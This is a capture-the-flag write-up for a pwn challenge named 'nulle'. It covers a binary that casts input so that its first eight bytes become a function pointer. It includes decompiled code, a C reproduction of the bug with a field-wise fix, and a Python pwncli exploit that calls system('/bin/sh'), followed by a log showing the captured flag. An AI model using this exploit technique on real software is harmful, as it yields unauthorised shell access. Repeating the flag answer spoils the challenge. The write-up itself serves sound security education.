pwn - nulle
Challenge description: Our developer got a bit too clever with C structs. They decided that if two structs have the same fields, just in a different order, it's fine to cast between them.
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
No PIE!!!
analysis
IDA F5 decompilation:
__int64 __fastcall main(int a1, char **a2, char **a3)
{
  psub_4011D5 = (__int64 (__fastcall *)())printf_w;
  printf_w((char *)is_your_n);                 // "is your\n"
  init();
  puts("please input something");
  read(0, is_your_n, 0x100u);                  // "is your\n"
  sub_401203(is_your_n);                       // "is your\n"
  return 0;
}
__int64 __fastcall sub_401203(__int64 (__fastcall **is_your_n)(char *))
{
  return (*is_your_n)((char *)is_your_n + 8);
}
Imported functions:
.dynsym
00000000004041B0 __libc_start_main@@GLIBC_2.34 .dynsym
00000000004041B8 puts@@GLIBC_2.2.5 .dynsym
00000000004041C0 system@@GLIBC_2.2.5 .dynsym
00000000004041C8 printf@@GLIBC_2.2.5 .dynsym
00000000004041D0 read@@GLIBC_2.2.5 .dynsym
00000000004041D8 setvbuf@@GLIBC_2.2.5 .dynsym
00000000004041E0 __gmon_start__ .dynsym
No PIE, and system is among the imports. main reads 0x100 bytes: the first 8 bytes are treated as an address, and the bytes after them are passed as a string argument in a call through that address.
So constructing system("/bin/sh\x00") is all it takes.
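Added example, not the challenge's source: a C reproduction of the bug class behind this binary, two structs with the same fields in a different order, where a pointer cast puts input bytes into the function-pointer slot. Struct names, field sizes and the handler type are assumptions; the fix shown is field-wise conversion instead of reinterpreting one layout as the other.

```c
#include <stddef.h>
#include <string.h>

typedef void (*handler_t)(const char *);

/* Same two fields, different order: the layouts are not interchangeable. */
struct name_first    { char name[248]; handler_t handler; };
struct handler_first { handler_t handler; char name[248]; };

/* 1 if the field offsets disagree, i.e. a pointer cast mixes the fields up. */
int layouts_differ(void)
{
    return offsetof(struct name_first, handler) != offsetof(struct handler_first, handler)
        || offsetof(struct name_first, name)    != offsetof(struct handler_first, name);
}

static void noop_handler(const char *s) { (void)s; }

/* The bug: cast the pointer and read `handler` through the wrong layout.
 * Returns 1 if the handler slot now holds the bytes that were written into
 * `name`, i.e. whatever the caller's input was. Nothing is called here. */
int cast_reads_handler_from_name(void)
{
    struct name_first nf;
    memset(&nf, 0, sizeof nf);
    memcpy(nf.name, "AAAAAAAA", 8);              /* constructed input bytes */
    nf.handler = noop_handler;
    const struct handler_first *wrong = (const struct handler_first *)&nf;
    return memcmp(&wrong->handler, "AAAAAAAA", sizeof(handler_t)) == 0;
}

/* The fix: convert field by field; never reinterpret one layout as the other. */
struct handler_first to_handler_first(const struct name_first *src)
{
    struct handler_first dst;
    memset(&dst, 0, sizeof dst);
    dst.handler = src->handler;
    memcpy(dst.name, src->name, sizeof dst.name);
    return dst;
}

/* 1 if the converted struct keeps the real handler and the name bytes intact. */
int conversion_preserves_fields(void)
{
    struct name_first nf;
    memset(&nf, 0, sizeof nf);
    memcpy(nf.name, "AAAAAAAA", 8);              /* constructed input bytes */
    nf.handler = noop_handler;
    struct handler_first hf = to_handler_first(&nf);
    return hf.handler == noop_handler && memcmp(hf.name, nf.name, sizeof nf.name) == 0;
}
```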
exp
#!/usr/bin/env python3
from pwncli import *

cli_script()
io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc

# first 8 bytes: the function pointer (system, fixed address since there is no PIE);
# the bytes after it: the string argument passed to that function
payload = pack(elf.sym.system) + b"/bin/sh\x00"
ru(b"input")   # wait for "please input something"
sl(payload)
ia()
$ cat home/solver/flag.txt
[DEBUG] Sent 0x19 bytes:
b'cat home/solver/flag.txt\n'
[DEBUG] Received 0x45 bytes:
b'CTF{53c4abb4d8484a0dceb0840356114dc43dabc0855ae22d84ae5bba996aa54c0a}'
CTF{53c4abb4d8484a0dceb0840356114dc43dabc0855ae22d84ae5bba996aa54c0a}
[*] Got EOF while reading in interactive